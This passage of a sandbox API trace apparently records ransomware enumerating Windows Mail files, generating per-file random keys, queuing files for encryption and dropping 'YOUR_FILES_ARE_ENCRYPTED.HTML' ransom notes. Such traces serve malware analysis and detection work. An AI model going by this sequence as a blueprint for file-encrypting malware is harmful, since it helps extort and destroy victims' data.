RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0170.770] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1920) returned 1 [0170.770] GetProcessHeap () returned 0x270000 
[0170.770] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a700 [0170.773] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A0") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="50") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="43") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C5") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="AF") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="F1") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="70") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="64") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="AE") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="97") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="B0") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="BF") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="57") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="D6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="B6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="46") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="05") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="EA") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="89") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="CA") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: 
param_1="D5") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="5D") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="E4") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="BC") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="98") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="D6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="AC") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="A0") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="F6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="47") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="66") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="6E") returned 2 [0170.775] lstrcpyW (in: lpString1=0x756a7b4, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" [0170.775] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x755a700, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.775] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a700, lpOverlapped=0x755a700) returned 1 [0170.775] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42016184, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shades of Blue.htm", cAlternateFileName="SHADES~1.HTM")) returned 1 [0170.775] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0170.775] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.775] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0170.775] lstrlenW (lpString=".htm") returned 4 [0170.775] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0170.775] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0170.776] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0170.776] CloseHandle (hObject=0x5b4) returned 1 [0170.776] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcafee00, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82949f3c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShadesOfBlue.jpg", 
cAlternateFileName="SHADES~1.JPG")) returned 1 [0170.776] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0170.776] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.776] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0170.776] lstrlenW (lpString=".jpg") returned 4 [0170.776] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0170.776] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0170.777] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4734) returned 1 [0170.777] GetProcessHeap () returned 0x270000 [0170.777] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7821160 [0170.781] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FB") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="00") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="FF") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="4D") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="1B") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="B6") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="C9") returned 2 [0170.781] 
wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="6F") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="95") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="69") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="AE") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="DA") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="1C") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="6A") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="B0") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="D0") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="05") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="FC") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="C4") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="03") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="34") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="16") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="FA") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="C3") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="7A") returned 2 [0170.782] lstrcpyW (in: lpString1=0x7831214, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\ShadesOfBlue.jpg" [0170.782] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x7821160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.782] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7821160, lpOverlapped=0x7821160) returned 1 [0170.782] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42062444, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Soft Blue.htm", cAlternateFileName="SOFTBL~1.HTM")) returned 1 [0170.782] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0170.782] lstrcmpW (lpString1="Soft Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.783] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0170.783] lstrlenW (lpString=".htm") returned 4 [0170.783] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0170.783] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0170.783] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) 
returned 1 [0170.783] CloseHandle (hObject=0x5f4) returned 1 [0170.783] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829961fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0170.783] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0170.784] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.784] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0170.784] lstrlenW (lpString=".jpg") returned 4 [0170.784] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0170.784] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0170.784] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10569) returned 1 [0170.784] GetProcessHeap () returned 0x270000 [0170.784] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78492b8 [0170.790] lstrcpyW (in: lpString1=0x785936c, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\SoftBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" [0170.790] CreateIoCompletionPort (FileHandle=0x5f4, ExistingCompletionPort=0x3a0, CompletionKey=0x78492b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.790] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78492b8, lpOverlapped=0x78492b8) returned 1 [0170.790] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x420ae704, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0170.790] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0170.790] lstrcmpW (lpString1="Stars.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.790] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0170.790] lstrlenW (lpString=".htm") returned 4 [0170.790] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0170.790] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0170.791] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=230) returned 1 [0170.791] CloseHandle (hObject=0x5f0) returned 1 [0170.791] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0170.791] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0170.791] lstrcmpW (lpString1="Stars.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.791] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0170.791] lstrlenW (lpString=".jpg") returned 4 [0170.791] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0170.791] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0170.792] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=7505) returned 1 [0170.792] GetProcessHeap () returned 0x270000 [0170.792] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x28150) returned 0x7871410 [0170.796] lstrcpyW (in: lpString1=0x78814c4, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" [0170.796] CreateIoCompletionPort (FileHandle=0x5f0, ExistingCompletionPort=0x3a0, CompletionKey=0x7871410, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.796] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7871410, lpOverlapped=0x7871410) returned 1 [0170.797] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 0 [0170.797] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.797] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0170.797] WriteFile (in: hFile=0x5b8, 
lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.800] CloseHandle (hObject=0x5b8) returned 1 [0170.800] GetProcessHeap () returned 0x270000 [0170.800] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0170.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb44be8bb, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0170.801] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0170.801] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.801] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.969] lstrlenW (lpString=".MSMessageStore") returned 15 [0170.969] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.969] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82b249d4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0170.969] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0170.969] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.969] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.969] lstrlenW (lpString=".pat") returned 4 [0170.969] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.969] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82b249d4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0170.969] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.969] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.970] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.973] CloseHandle (hObject=0x5fc) returned 1 [0170.973] GetProcessHeap () returned 0x270000 [0170.974] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.985] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0170.986] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media") returned 58 [0170.986] GetProcessHeap () returned 0x270000 [0170.986] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.988] lstrcpyW (in: lpString1=0x7759008, 